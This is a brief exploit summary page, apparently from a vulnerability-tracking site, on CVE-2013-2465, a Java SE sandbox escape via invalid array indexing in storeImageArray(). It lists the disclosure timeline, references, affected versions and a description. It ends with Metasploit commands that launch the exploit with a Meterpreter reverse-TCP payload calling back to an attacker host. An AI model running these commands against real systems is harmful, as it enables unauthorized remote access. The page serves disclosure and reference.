Timeline :
Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by vendor the 2013-06-18
PoC provided by Packet Storm the 2013-08-12
Metasploit PoC provided the 2013-08-19
PoC provided by :
Name Withheld
sinn3r
juan vazquez
Reference(s) :
CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013
Affected version(s) :
Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before
Tested on Windows XP Pro SP3 with :
Java SE 7 Update 17
Description :
This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to cause a memory corruption and escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.
Commands :
use exploit/multi/browser/java_storeimagearray set RHOST 192.168.0.20 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.20 exploit sysinfo getuid